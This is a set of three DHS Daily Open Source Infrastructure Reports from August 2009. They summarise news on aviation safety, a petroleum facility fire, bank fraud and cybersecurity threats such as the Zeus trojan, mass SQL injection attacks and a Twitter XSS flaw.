Department of Homeland Security Daily Open Source Infrastructure Report

Monday, August 31, 2009

Complete DHS Daily Report for August 31, 2009

Daily Report

Top Stories

 The Tampa Bay Business Journal reports that the Federal Aviation Administration is investigating Southwest Airlines after a routine inspection found that the airline had installed unauthorized parts on 46 of its planes. The carrier grounded those planes for several hours on August 22 after the FAA’s inspection. (See item 22)


22. August 27, Tampa Bay Business Journal – (National) FAA investigating Southwest Airlines. The Federal Aviation Administration (FAA) is investigating Southwest Airlines after a routine inspection found that the airline had installed unauthorized parts on 46 of its planes. The Dallas-based carrier grounded those planes for several hours Saturday after the FAA’s inspection. The unauthorized part, known as a hinge fitting, goes on the airplane’s wing, an FAA spokesman said. The FAA determined that the unauthorized part “was not an immediate safety hazard,” and it is working with Southwest to find a solution. Though the FAA found no immediate safety issue, Southwest temporarily grounded the planes anyway. The 46 planes in question represent close to 10 percent of Southwest’s total fleet, but the airline would be able to accommodate passengers in the event that they were grounded. The company has extra planes available for contingencies. Source: http://www.bizjournals.com/tampabay/stories/2009/08/24/daily53.html


 According to IDG News Service, the FBI is trying to figure out who is sending unsolicited laptop computers to state governors across the United States. Some state officials are worried that the laptops may contain malicious software for accessing government computers. (See item 34)


34. August 27, IDG News Service – (National) FBI investigating laptops sent to U.S. governors. There may be a new type of Trojan Horse attack to worry about. The U.S. Federal Bureau of Investigation is trying to figure out who is sending laptop computers to state governors across the United States, including the West Virginia governor and Wyoming governor. Some state officials are worried that they may contain malicious software. According to sources familiar with the investigation, other states have been targeted too, with HP laptops mysteriously ordered for officials in 10 states. Four of the orders were delivered, while the remaining six were intercepted, according to a source who spoke on condition of anonymity because of the ongoing investigation. The West Virginia laptops were delivered to the governor’s office several weeks ago, prompting state officials to contact police, according to the state’s chief technology officer. “We were notified by the governor’s office that they had received the laptops and they had not ordered them,” he said. “We checked our records and we had not ordered them.” State officials in Vermont and Wyoming told him they have received similar unsolicited orders, he said. Although there is no evidence that the computers contain malicious code, HP confirmed on August 27 that there have been several such orders and that they have been linked to fraud. HP is working with law enforcement personnel on a criminal investigation. Criminals have tried to put malware on USB devices and then left them outside company offices, hoping someone would plug them into a computer and inadvertently install malicious software on the network. Many Windows systems are configured to automatically run software included on CDs and USB devices using a Windows feature called AutoRun. Many organized criminals would be happy to spend the cost of five PCs in order to access government computers, said the director of investigations with security consultancy Team Cymru. Source: http://www.pcworld.com/article/170970/fbi_investigating_laptops_sent_to_us_governors.html


Details

Banking and Finance Sector

15. August 28, St. Louis Business Journal – (National) Banks on FDIC’s problem list top 400. The FDIC added 111 banks to its “Problem List” in the second quarter. At the end of June, there were 416 insured institutions on the list, up from 305 on March 31. This is the largest number of institutions on the list since June 30, 1994, when there were 434 institutions on the list, according to the government fund that protects consumer deposits. Total assets of problem institutions increased during the quarter from $220 billion to $299.8 billion, the highest level since December 31, 1993. The Federal Deposit Insurance Corp. does not name the problem banks. Deteriorating loan quality in the second quarter continued to hamper commercial banks and savings institutions insured by the Federal Deposit Insurance Corp., sending them to a multi-billion-dollar loss. Banks insured by FDIC posted a loss of $3.7 billion in the second quarter, the FDIC said on August 27. This compares with a $4.8 billion profit in the second quarter of 2008. And more than 28 percent of all insured institutions reported a loss in the second quarter, compared with 18 percent a year earlier. Source: http://www.bizjournals.com/stlouis/stories/2009/08/24/daily57.html


16. August 27, ZDNet – (National) Hackers mailing malware-infested CDs to banks. Reminiscent of the days when viruses were distributed on floppy disks, cybercriminals are currently mailing infected CDs to credit unions and smaller banks as part of a clever offline scheme to load malicious software into computers with valuable data. According to an alert issued by the National Credit Union Association, a credit union reported receiving a bogus fraud advisory accompanied by two compact discs. The letter advises credit unions to review training material (contained on the CDs). Doing so could result in a possible security breach to a user’s computer system, or have other adverse consequences. The letter contains several spelling and grammatical errors but, as a researcher points out, this low-tech attack method can be highly effective because smaller businesses are not properly equipped and educated to deal with these types of threats. Source: http://blogs.zdnet.com/security/?p=4121


17. August 27, U.S. Department of Justice – (National) Stanford Financial Group CFO pleads guilty to charges related to $7 billion scheme to defraud investors. The former chief financial officer of Houston-based Stanford Financial Group (SFG) pleaded guilty Thursday to fraud and obstruction charges related to a $7 billion scheme to defraud investors. The former chief was charged in a criminal information, filed on June 18, 2009, with conspiracy to commit mail, wire and securities fraud; mail fraud; and conspiracy to obstruct a U.S. Securities and Exchange Commission (SEC) investigation. According to the plea documents, the former chief admitted that as part of the scheme, he and his co-conspirators defrauded investors who purchased approximately $7 billion in certificates of deposit (CDs) administered by Stanford International Bank Ltd. (SIBL), an offshore bank located on the island of Antigua. He further admitted that he and his co-conspirators misused and misappropriated most of those investor assets, including by diverting more than $1.6 billion into undisclosed personal loans to a co-conspirator, while misrepresenting to investors SIBL’s financial condition, its investment strategy and the extent of its regulatory oversight by Antiguan authorities. According to the plea documents, the former chief and his co-conspirators began in 1990 to make false entries into the general ledgers of SIBL relating to revenues and revenue balances. Source: http://www.usdoj.gov/opa/pr/2009/August/09-ag-880.html


18. August 27, The Register – (International) Trojan zaps banking credentials via IM. Instant messaging is being adopted by a growing number of banking malware applications, which zap pilfered credentials to thieves in real time. The latest entrant is Zeus, a trojan that monitors an infected PC for passwords entered into banking websites and other financial services. Over the past three months, investigators from RSA FraudAction Research Lab have observed the program, which also goes by the name Torpig and Mebroot, using the Jabber IM protocol to make sure the most valuable credentials do not get lost in the shuffle. The move signals the growing focus on immediacy among scammers as they try to counter the increased use of measures designed to detect and prevent banking fraud. “One of the things that has definitely changed in recent times is that the half life of a stolen credential is decreasing,” said a senior manager for identity protection and verification at RSA, a division of EMC. “There is definitely a sense of urgency of the part of these fraudsters about using the credential.” Previously, Zeus uploaded the credentials to a drop server database, which scammers periodically checked. The new method employs PHP scripts that automatically send credentials as soon as they are intercepted. That allows thieves to retrieve the information much more quickly than would otherwise be possible. It also allows retrieval even when crooks, many of whom do not always have reliable net connections, do not have access to the server hosting the drop. As a growing number of banks adopt the use of one-time passwords, the need for speedier delivery mechanisms is growing. Instant messaging makes it possible for thieves to thwart such measures by, in some cases, allowing them to silently make transactions while a victim is still logged in to an online bank. A competing trojan known as Sinowal has used similar methods since last year, RSA researchers said. Source: http://www.theregister.co.uk/2009/08/27/zeus_adopts_instant_messaging/


Information Technology


38. August 28, Tech Herald – ( International) Symantec discovers Trojan targeting Skype users. Early on August 27, Symantec issued an advisory that they have discovered the availability of source code for a Trojan that targets Skype users. The Trojan, once installed on a system, has the ability to record conversations in progress, and transmit the recording to a third party. The Trojan is being called Trojan.Peskyspy, and can be delivered in any number of ways, including email links and social engineering attacks, where a user is tricked into downloading and installing an application. The Trojan is targeting Windows API hooks, a technique used to alter the planned behavior of an application, which Microsoft has intended to be used by audio applications. The Trojan compromises the machine and then through the hooking technique is able to eavesdrop on a conversation before it even reaches Skype, or any other audio application. Once a machine has been compromised, the Skype Trojan can use an application that handles audio processing within a computer and save the call data as an MP3 file. This MP3 is then sent over the Internet to a predefined server where the attacker can then listen to the recorded conversations. The MP3 is stored locally and encrypted before it is sent off. “Recording the call as an MP3 keeps the size of the audio files low and means there is less data to be transferred over the network, helping to speed up the transfer and avoid detection,” Symantec said in their alert. Presently, Symantec is calling the risk posed by this threat quite low, as they have not seen any evidence of compiled versions of the Trojan moving around online. Source: http://www.thetechherald.com/article.php/200935/4325/Breaking-Symantec-discovers-Trojan-targeting-Skype-users


39. August 28, The Register – (International) Hackers serve up pre-release malware to Mac fanboys. Virus slingers are taking advantage of the release of Apple’s Snow Leopard operating system by offering malware from sites touting operating system upgrades. Dodgy sites supposedly offering Snow Leopard were rigged to push an Apple-specific DNS changer Trojan, detected by Trend Micro as JAHLAV-K. The malware is a MAC OS X mountable Disk Image file (.DMG) that comes contaminated with various malicious scripts, as explained here. Users infected with the Apple specific malware would find their internet connections redirected to phishing sites and other fraudulent endeavours. Some of these bogus sites hosted scareware (fake anti-virus) packages. Fake sites offering the Mac malware were in operation in the run-up to the release of Snow Leopard on August 28. There are more details in a blog on Trend Micro’s website. A similar attack, detected earlier the week of August 24, offered malware in the guise of Foxit PDF Reader software for Apple Macs. The pirated version “Foxit Reader for Mac” comes loaded with the Jahlav Trojan horse, anti-virus firm Sophos warns. Foxit Reader is not yet officially available for Apple Macs. When it does come out, prospective users ought to use the official Foxit website, Foxit advises. Source: http://www.theregister.co.uk/2009/08/28/fake_mac_software_malware/


40. August 27, Network World – (International) Web attacks across globe appear linked, security researcher says. Three significant waves of SQL injection attacks appear to be under the control of the same source, according to one security researcher. Roughly 80,000 Web sites in China, 67,000 in the U.S. and 40,000 in India remain compromised and under botnet control as a result of separate and ongoing SQL injection attacks. The highest infection point during the last three months reached into the millions at one point in China. The SQL injection attacks have inserted malicious iFrames into legitimate Web sites in order to force visitors off them and onto dangerous malware-laden sites. A senior security researcher at ScanSafe says she believes these three waves of SQL injection attacks are likely the handiwork of the same attacker because of the similarity of the domain-name registration information and style of attack. “It’s the thread of the domain names being used,” the researcher says. Seven of these “mal-domains,” a term coined by the researcher to describe domain names used solely to build Internet infrastructure to spread malware or otherwise cause harm, were registered under the same name and address (which are clearly bogus, being not more than gibberish). These domain names are now apparently being farmed out across the world as part of the globally distinct attacks in China, U.S. and India. In this case, the identified domain names were registered using bogus information provided to registrar Go Daddy, which the researcher says is “highly unusual,” since Go Daddy has a generally good reputation and attackers typically prefer “domain name providers that turn a blind eye.” Source: http://www.networkworld.com/news/2009/082709-sql-attacks-linked.html


41. August 27, PC1News – (International) Is Worm.Deborm hiding in your LAN? Computer worms, viruses, Trojans and other threats are increasingly looking for ways to exploit systems. Some of them actively try to break into a user’s PC and others just patiently wait till the user provides the way to the system. But no matter how a threat finds its way into a PC; the most important thing is that as soon as one enters the system, the machine is at risk of being destroyed or otherwise negatively affected. That is the case with Deborm, a worm spreading itself without any user intervention. Deborm has the ability to propagate itself via networks. In other words, Worm.Deborm spreads itself over a local area network (LAN) to any computers that have writable file shares. Once executed, Worm.Deborm will copy itself to a startup folder; as a result, it will automatically run upon reboot. This parasite has the ability to break simple passwords that are used either on the machine or when surfing the web. It is also important to note that Deborm worm will install a backdoor that will then allow a remote attacker access to a user’s computer system. Through this backdoor cyber criminals will be able to download additional malware, execute suspicious and often malicious programs, as well as steal confidential personal and financial information. Worm.Deborm is known to be related to a file called malware.exe. It has many distinct variants with different MD5 signatures. Source: http://www.pc1news.com/news/0961/worm-deborm.html

For another story, see item 42 below

Communications Sector

42. August 27, IDG News Service – (International) New attack cracks common Wi-Fi encryption in a minute. Computer scientists in Japan say they have developed a way to break the WPA encryption system used in wireless routers in about one minute. The attack gives hackers a way to read encrypted traffic sent between computers and certain types of routers that use the WPA (Wi-Fi Protected Access) encryption system. The attack was developed by two professors who plan to discuss further details at a technical conference set for September 25 in Hiroshima. In November 2008, security researchers first showed how WPA could be broken, but the Japanese researchers have taken the attack to a new level, according to the organizer of the PacSec security conference where the first WPA hack was demonstrated. “They took this stuff which was fairly theoretical and they’ve made it much more practical,” he said. The Japanese researchers discuss their attack in a paper presented at the Joint Workshop on Information Security, held in Kaohsiung, Taiwan earlier in August. The earlier attack, developed by two researchers, worked on a smaller range of WPA devices and took between 12 and 15 minutes to work. Both attacks work only on WPA systems that use the Temporal Key Integrity Protocol (TKIP) algorithm. They do not work on newer WPA 2 devices or on WPA systems that use the stronger Advanced Encryption Standard (AES) algorithm. Source: http://www.computerworld.com/s/article/9137177/New_attack_cracks_common_Wi_Fi_encryption_in_a_minute?taxonomyId=17

Department of Homeland Security Daily Open Source Infrastructure Report

Friday, August 28, 2009

Complete DHS Daily Report for August 28, 2009

Daily Report

Top Stories

 According to the Associated Press, a fire broke out Thursday at Sterling Services, a bulk petroleum facility, in Hamtramck, Michigan, sending flames and black smoke hundreds of feet into the air, interrupting Amtrak passenger rail service, and forcing hundreds of people to evacuate the area. (See item 3)


3. August 27, Associated Press – (Michigan) Fire rages at chemical plant near Detroit. A fire broke out Thursday at a chemical plant in Hamtramck, near Detroit, sending flames and black smoke hundreds of feet into the air, interrupting Amtrak passenger rail service, and forcing hundreds of people to evacuate the area. The fire broke out about 11:30 a.m., and Hamtramck officials quickly called in the Detroit and Highland Park fire departments for assistance. The fire is at Sterling Services, a company involved in the biofuel business. There were no reports of injuries. Amtrak passenger rail service was suspended between Pontiac and Detroit, about 20 miles apart. An Amtrak spokesman said passengers will be shuttled between the cities by charter bus. Residents were evacuated for about a half-mile around the fire, said the executive director of the Hamtramck Housing Commission. That included a nearby complex of 36 buildings containing 300 apartments and some 700 to 800 residents, though he said not all were home at the time of the blaze. An evacuation center was set up at a nearby senior center with water available for evacuees. About 15 or 20 people had arrived by about 1 p.m. The plant is in an industrial area with several small factories. Sterling Services Ltd. is registered as a bulk petroleum facility that stores large quantities of gasoline or other fuels, said a spokesman for the Michigan Department of Environmental Quality. State or federal environmental officials will monitor air quality at the scene. Sterling Services is a subsidiary of Southfield-based Sterling Oil & Chemical Co. Inc., according to a company Web site. The Hamtramck facility is on more than five acres and has a storage capacity of about 5 million gallons. Source: http://www.google.com/hostednews/ap/article/ALeqM5goc8-VWKIhOO60FQkeT2kXp5-pMAD9ABBTNO0


 The Asbury Park Press reports that the Oyster Creek nuclear power plant in Lacey, New Jersey was operating at half its generating capacity Wednesday following a new tritium leak discovered Monday. This is the second leak since the plant was relicensed on April 8. (See item 7)


7. August 26, Asbury Park Press – (New Jersey) Oyster Creek reduces power generation to fix leak. The Oyster Creek nuclear power plant in Lacey was operating at half its generating capacity Wednesday following a new tritium leak discovered Monday. A plant spokesman said the reduction in power generation “allows us to gain safe access to the turbine building and into the 6-inch aluminum line which was found to be leaking.” A Nuclear Regulatory Commission spokesman said that the leak appears to be from an aluminum, non-safety-related condensate transfer line. “The leak is about 48 hours old, and we have a rigorous monitoring system,” the plant spokesman said Wednesday. “We contacted the state nine minutes within getting a positive hit on tritium within a water sample taken.” The plant spokesman said the plant will repair or replace the line. “There is no half-stepping on this,” he said. “They (plant engineers) will work 24 hours a day to get this done quickly and get it done right.” Environmentalists who oppose the power plant’s operation were quick to respond. The director of the New Jersey Sierra Club said, “This is the second leak since the plant was relicensed. This shows the plant is unsafe and should be closed pending an independent evaluation.” The NRC renewed Oyster Creek’s operating license on April 8. Source: http://www.app.com/article/20090826/NEWS/908260349/1070/NEWS02/Oyster+Creek+reduces+power+generation+to+fix+leak


Details

Banking and Finance Sector

14. August 27, Bloomberg – (International) Swiss negotiator for UBS says IRS may seek more data. Switzerland’s chief negotiator in the UBS AG tax case said the U.S. Internal Revenue Service may request names of American clients from other banks after the Swiss government agreed to hand over UBS account details. “It is possible that the IRS will ask for more data on U.S. customers at other Swiss banks,” the individual who led discussions for the Swiss foreign ministry said on August 26 in written comments to Bloomberg News. The individual is the country’s most senior diplomat and a mathematician by training. A disclosure similar in scope to the August 19 agreement is “questionable” because UBS is the only Swiss bank to admit unlawful behavior in its efforts to win rich U.S. clients, he said. The IRS plans to target more banks, law firms and entities that help Americans hide assets, the IRS commissioner said when the settlement was announced. While Swiss banks manage about 27 percent of the world’s offshore wealth, tax evasion through offshore accounts robs the U.S. of $100 billion annually, according to U.S. officials. Under the deal, UBS agreed to provide Swiss authorities with details of 4,450 accounts where “tax fraud or the like” is suspected. While Switzerland has a year to decide which data to pass on to the IRS, legal appeals may delay the transfer beyond that time period, according to a Swiss justice ministry spokesman. Source: http://www.bloomberg.com/apps/news?pid=20601087&sid=aH7Ud2ZQb7bg


15. August 27, WKYC 3 Cleveland – (Ohio) Cleveland: Largest mortgage scam in U.S. history uncovered here. Just as Cleveland became the foreclosure capital of the country, prosecutors say a savvy man with an eye for real estate found a way to scam and profit. The defendant, of Beachwood, was charged August 25 for masterminding the largest mortgage scam in U.S. history. For over thirty minutes, representatives from the FBI, the Ohio Attorney General’s Office and Cuyahoga County prosecutors explained in detail how the defendant capitalized on the crisis. Prosecutors allege he would enlist “straw buyers” to purchase foreclosed homes. A second set of buyers would then use false documents to acquire bank loans that allowed them to buy the home at twice the original purchase price. The defedant and his team would then pocket the difference, leaving the lenders holding the bag. In all, 453 homes were purchased with $44 million in fraudulent loans. Source: http://www.wkyc.com/news/local/news_article.aspx?storyid=120479&catid=3


16. August 27, Reuters – (National) Wilbur Ross says FDIC bank rules better. A billionaire investor said on August 27 that while he plans to invest further in banks, the capital requirements for private equity investment in the sector set by regulators yesterday are limiting. The investor, in an interview with Reuters Television, said the Federal Deposit Insurance Corp decision on Wednesday to set a Tier 1 common equity ratio at 10 percent rather than the 15 percent previously proposed did not go far enough. “We will now be able to be a bidder, whereas at the 15 percent capital level it would have been ridiculous ... We’ll be in the game, but not as aggressively as we had been,” he said. He said an equity ratio of 7.5 percent would still be 50 percent more than a typical bank must have to be well capitalized, and would reduce the capital required to buy a bank while also improving returns. He said he is particularly interested in the Sun Belt states, including Florida, Arizona, Texas and potentially Nevada, where retail deposits are strong. Source: http://www.reuters.com/article/innovationNews/idUSTRE57Q2SJ20090827


17. August 26, Virginia Gazette – (Virgina) C&F Bank warns of phishing scam. C&F Bank is warning customers about a scam targeting cell phone customers of Verizon and Sprint. According to a statement issued by the bank on August 2, the scam involves an attempt to use e-mail or text messages to extract account or personal information from people who may or may not be C&F customers.The message will ask the recipient to respond to a “problem” and ask for account numbers, passwords, etc. No bank will ask customers for sensitive account information. In this case, it appears a large amount of Sprint and Verizon cellular numbers were acquired by criminals. The same message was sent to all recipients, inserting a bank name, in some cases C&F, in the subject line. Anyone receiving the suspicious e-mails or messages is asked to call the bank and report the incident. Source: http://www.vagazette.com/articles/2009/08/26/news/doc4a95ab8fa95d3667611286.txt


Information Technology


43. August 26, Nextgov – (National) DHS to test Obama’s national cyber response plan with third large-scale exercise. The Homeland Security Department’s third large-scale cybersecurity drill in September 2010 will test the national cyber response plan currently being developed by the U.S. Presidential Administration, said industry and government participants in the simulation exercise during a conference on August 25. Cyber Storm III will build upon the lessons learned in the two previous exercises that took place in February 2006 and March 2008, and provide the first opportunity to assess the White House strategy for responding to a cyberattack with nationwide impact. “The national cyber response plan will be an offshoot of a lot of the findings that came out of Cyber Storm I and II that will formalize the roles and responsibilities,” said the director of the cyber exercises program in DHS’ national cybersecurity division. He participated on an afternoon panel at the GFirst conference in Atlanta hosted by the department’s U.S. Computer Emergency Readiness Team. “It’s not a direct cause-and-effect relationship, but a lot of questions bubbled up [from the exercises],” followed by the announcement along with the U.S. President’s 60-day cyber review that a response plan should be developed. Details of the national cyber response plan are still being finalized through weekly meetings with stakeholders from federal government and industry. An initial report is scheduled to be released in November, less than a year before Cyber Storm III kicks off, said the vice president of government affairs and critical infrastructure protection at Juniper Networks, who is among the industry representatives involved in both the plan’s development and the Cyber Storm exercises. Source: http://www.nextgov.com/nextgov/ng_20090826_9168.php?oref=topnews


44. August 26, New York Times – (International) Defying experts, rogue computer code still lurks. The rogue software program known as Conficker that glided onto the Internet last November has confounded the efforts of top security experts to eradicate the program and trace its origins and purpose, exposing serious weaknesses in the world’s digital infrastructure. Conficker uses flaws in Windows software to co-opt machines and link them into a virtual computer that can be commanded remotely by its authors. With more than five million of these zombies now under its control — government, business and home computers in more than 200 countries — this shadowy computer has power that dwarfs that of the world’s largest data centers. Computer security experts decoded the program and developed antivirus software that erased it from millions of the computers. Researchers speculate that the computer could be employed to generate vast amounts of spam; it could steal information like passwords and logins by capturing keystrokes on infected computers; it could deliver fake antivirus warnings to trick naive users into believing their computers are infected and persuading them to pay by credit card to have the infection removed. There is also a different possibility that concerns the researchers: That the program was not designed by a criminal gang, but instead by an intelligence agency or the military of some country to monitor or disable an enemy’s computers. The experts have only tiny clues about the location of the program’s authors. The first version included software that stopped the program if it infected a machine with a Ukrainian language keyboard. There may have been two initial infections — in Buenos Aires and in Kiev. The program is protected by internal defense mechanisms that make it hard to erase, and even kills or hides from programs designed to look for botnets. A member of the security team said that the FBI had suspects, but was moving slowly because it needed to build a relationship with “noncorrupt” law enforcement agencies in the countries http://www.nytimes.com/2009/08/27/technology/27compute.html


45. August 26, Fileforum – (International) Microsoft Windows Server Update Service (WSUS). WSUS is the new name for the next version of Windows Server Update Service (WSUS). WSUS (previously SUS 2.0) is a feature of Windows Server. It is a patch and update tool that offers an effective and quick way to help a user get secure and stay secure. It represents the first step toward delivering core software distributionand update management infrastructure in Windows. It has both a server and client component. WUS will support updating Windows operating systems as well as all Microsoft corporate software over time. When initially released, it will support updating Windows XP Professional, Windows 2000, Windows Server 2003, MicrosofOffice XP, Office 2003, SQL Server 2000, MSDE 2000, and Exchange Server 2003. Source: http://fileforum.betanews.com/detail/Microsoft-Windows-Server-Update-Service-WSUS/1106866721/1


46. August 26, SCMagazine – (International) Twitter XSS vulnerability not yet fixed. A major cross-site-scripting vulnerability in Twitter that could result in a user’s account being taken over has yet to be fixed despite Twitter’s claim that it has, according to thsoftware developer who discovered the bug. The developer first described the vulnerability, which allows malicious JavaScript code to be inserted into tweets, on August 25 on the blog of a search marketing executive. Twitter’s application programming interface (API), used by developers to create applications to post tweets,such as TweetDeck, TwitterFox or HootSuite, does not properly filter the URL of thesprograms. As a result, users could actually insert malicious JavaScript code along witha URL. “With a few minutes work, someone with a bit of technical expertise could make a Twitter ‘application’ and start sending tweets with it,” the developer explainedin a blog post on August 26. “It can be arranged so that if another Twitter user so mucas sees one of these tweets, and they are logged in to Twitter, their account could be taken over.” Because of the bug, attackers could capture account credentials, redirect auser to a site of their choosing, alter a user’s tweets or “followers,” or send messages from a compromised account. “The main impact is that it could be abused by anyone really, to steal your [login] details or impersonate your Twitter,” the developer, who works for search engine optimization company, Bronco Internet, told SCMagazineUS.com. Source: http://www.scmagazineus.com/twitter-xss-vulnerability-not-yet-fixed/article/147352/

Communications Sector

Nothing to report.

Daily Report Template - Version 1

Thursday, August 27, 2009

Complete DHS Daily Report for August 27, 2009

Daily Report

Much more in the Information Technology and Communications Sectors than usual! Many, if not all warrant YOUR attention!

Top Stories

 PC World reports that the Air Line Pilots Association is calling on the U.S. government to temporarily ban cargo shipments of lithium batteries, saying they represent a serious safety hazard. (See item 14)


14. August 26, PC World – (International) Airline pilots want ban on lithium battery shipments. An airline pilot union is calling on the U.S. government to temporarily ban cargo shipments of lithium batteries, saying they represent a serious safety hazard. The Air Line Pilots Association (ALPA), which represents pilots in the U.S. and Canada, asked that the U.S. government prohibit shipments of lithium batteries on all cargo and passenger flights until measures are taken to insure that such shipments are safe. The proposed ban on the batteries, which are widely used in electronic devices like phones and computers, would not prohibit passengers from carrying batteries on planes. During the last two months, there have been three incidents where fire or smoke on aircraft was caused by shipments of lithium batteries. On August 14, the crew of a plane that landed in Minneapolis received a warning of smoke in the plane’s forward cargo compartment. When fire crews opened the compartment, they found flames coming from a container filled with electronic cigarettes, each containing a lithium-ion battery. In another incident in July, a container filled with lithium-ion batteries on a flight to Santo Domingo, Dominican Republic, was found smoking and smoldering. In the third incident, which took place in June, a burned package containing a lithium-ion bicycle motor was discovered when cargo handlers unloaded a plane in Honolulu. ALPA said all three incidents recall a 2006 incident where lithium batteries caused a fire on board a UPS plane that injured three crew members and damaged cargo. Source: http://www.pcworld.com/article/170815/airline_pilots_want_ban_on_lithium_battery_shipments.html


 According to Softpedia, researchers at Web security company ScanSafe advise that a new mass compromise attack is underway and has affected over 62,000 URLs to date. A rogue IFrame injected into the compromised Web pages loads a cocktail of exploits and malware from other domains. (See item 40)


40. August 25, Softpedia – (International) Over 62,000 new URLs serving exploit cocktail. Security researchers advise that a new mass compromise attack is underway and has affected over 62,000 URLs to date. A rogue IFrame injected into the compromised Web pages loads a cocktail of exploits and malware from other domains. Web security company ScanSafe has been monitoring this new threat and advises that the infection pattern is a hidden IFrame loading JavaScript content from a domain called a0v.org. A Google search for “script src= reveals 62,100 results. A senior security researcher at ScanSafe, has told The Register that the infections are the result of SQL injection attacks. The x.js called from a0v.org has the role of loading exploits from a number of seven other domain names. At the moment of writing this article, Google’s Safe Browsing was tagging a0v.org as malicious. “The malware hosting domains were registered on or after August 3, 2009 and include: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info. The most prolific observed by ScanSafe thus far has been ahthja.info,” the researcher writes on the company’s blog. If exploitation is successful, several malware installers are dropped and executed onto the victim’s computer as drive-by downloads. The security researcher warns that “post infection, additional malware may also be downloaded” from a different host. The exploits target vulnerabilities in popular software, including Internet Explorer, Mozilla Firefox, Adobe Flash Player, Adobe Reader and Acrobat or avast! Antivirus. AV detection rates for the malicious executables downloaded during the attack range from poor to moderate on Virustotal. Source: http://news.softpedia.com/news/Over-62-000-New-URLs-Serving-Exploits-Cocktail-120006.shtml


Details

Banking and Finance Sector

11. August 25, Bloomberg – (National) Court orders Fed to disclose emergency bank loans. The Federal Reserve must for the first time identify the companies in its emergency lending programs after losing a Freedom of Information Act lawsuit. The Manhattan chief U.S. district judge ruled against the central bank on August 24, rejecting the argument that loan records are not covered by the law because their disclosure would harm borrowers’ competitive positions. The Fed has refused to name the financial firms it lent to or disclose the amounts or the assets put up as collateral under 11 programs, most put in place during the deepest financial crisis since the Great Depression, saying that doing so might set off a run by depositors and unsettle shareholders. Bloomberg LP, the New York-based company majority-owned by the mayor of New York, sued on November 7, 2008 on behalf of its Bloomberg News unit. “The Federal Reserve has to be accountable for the decisions that it makes,” said a U.S. Representative, who is a Florida Democrat on the House Financial Services Committee, after the judge’s ruling. “It’s one thing to say that the Federal Reserve is an independent institution. It’s another thing to say that it can keep us all in the dark.” Source: http://www.bloomberg.com/apps/news?pid=20601087&sid=a7CC61ZsieV4


12. August 25, Dow Jones Newswires – (New York) NY businessman charged with $74 million bank fraud against Citigroup. A New York man was charged with allegedly defrauding Citigroup Inc. out of $74 million in loans. The U.S. attorney in Manhattan and the Federal Bureau of Investigations say the defendant, with residences in Manhattan and Katonah, New York, fraudulently applied for the loans for Nemazee Capital Corp., of which he is chairman and chief executive. Federal prosecutors contend Nemazee obtained the money by giving the banking giant “numerous documents that purported to establish the existence of accounts in Nemazee’s name at various financial institutions containing many hundreds of millions of dollars,” the Justice Department said in a statement. “In fact, those were fraudulent and forged documents.” According to an FBI report, the defendant first contacted Citigroup’s Citibank in December 2006 to borrow $25 million, and later raised the sum to $80 million. The defendant paid back more than $74 million on August 24, after being questioned by federal agents on August 23 as he was checking in to board a flight from Newark International Airport in New Jersey to Rome. Source: http://money.cnn.com/news/newsfeeds/articles/djf500/200908251258DOWJONESDJONLINE000315_FORTUNE5.htm


13. August 25, Computerworld – (National) Cybercrooks increasingly target small business accounts. An organization representing more than 15,000 financial institutions has issued a warning about a growing wave of attacks against small banks and businesses by cybercriminals using stolen banking credentials to plunder corporate accounts. In an alert to its members earlier this month, NACHA — the Electronics Payments Association — said that attackers are increasingly stealing online banking credentials, such as user names and paswords, from small businesses by using keystroke logging tools and other malware. The cybercriminals are using the stolen credentials to “raid” and “take over” corporate accounts and initiate the unauthorized transfer of funds over electronic payment networks. NACHA oversees the Automated Clearing House (ACH) electronic payments network. NACHA’s alert said that the cybercrooks are apparently targeting small businesses because of their relative lack of strong authentication procedures, transaction controls and “red flag” reporting capabilities. In some cases, the alert said, attackers are tricking small business workers into visiting phishing sites with the same look and feel as their company’s financial institution, where they would log on using their credentials. Source: http://www.computerworld.com/s/article/9137112/Cybercrooks_increasingly_target_small_business_accounts


Information Technology


36. August 26, Network World – (International) Trojan attacks up, phishing attacks down this year, IBM finds. Spam-based phishing attacks declined noticeably during the first half of the year, but cyber-criminals may simply be shifting to other technologies found to be more effective in stealing personal data, according to IBM in its semi-annual security threat report. “The decline in phishing and increases in other areas (such as banking Trojans) indicate the attackers may be moving their resources to other methods to obtain the gains that phishing once achieved,” is the explanation offered in the “IBM Internet Security Systems 2009 Mid-Year Trend & Risk Report.” It says Russia is the top country of origin for phishing e-mails, with 7.2 percent share, while China is the top hosting country for spam URLs. IBM’s semi-annual security report presents a broad view of trends based on its own analysis of volumes of sensor data, Web crawling technologies and other resources used to gather information through its Internet Security Systems division. In the first half of 2009, 55 percent of the new malware seen was Trojans, an increase of 9 percent over last year, the report says. Trojan malware, which includes components called downloaders and info-stealers, are mainly being used in the form of “public-available toolkits” that are “easy to use” by criminals, the report points out. The number of malicious Web links used to trick users into downloading malware or visiting dangerous sites has increased, up 508 percent in the first half of 2009 in comparison to the number discovered in the first half of 2008, says the report. The U.S. is the top country where such malicious Web links can be found, accounting for 36 percent of known malicious links, with China holding the second spot. Source: http://www.networkworld.com/news/2009/082609-ibm-malware-trojans.html


37. August 26, Daily Tech – (International) Apple reportedly using malware detection in Snow Leopard. Not wanting to be made the target of new PC ads mocking its lack of antivirus support, Apple reportedly is packaging its new OS X 10.6 “Snow Leopard”, set to air on August 28, with free antivirus software. Security research firm Intego, which maintains a Mac security blog that monitors various OS X-specific malware, first noticed and reported the development. The firm was running the new version of OS X, when they noticed it detected and removed malware. The process was carried out via a popup window, which they took a screenshot of, but they were either unable to determine or chose not announce who made the antivirus software. Intego’s post indicated that they were not making the product. ClamAV — currently the AV engine in Apple’s server operating system — also seems unlikely as the virus detected had the signature “OSX.RSPlug.A”, a signature that ClamAV currently doesn’t support (ClamAV does have a signature for “OSX.RSPlug” [1]). Similar, McAfee and Sophos use the names OSX/Puper.a [2] and OSX/RSPlug-A [3], respectively. That leaves Symantec as one possibility. Another is that Apple has developed its own proprietary antivirus software, which would not be surprising. Source: http://www.dailytech.com/Apple+Reportedly+Using+Malware+Detection+in+Snow+Leopard/article16083.htm


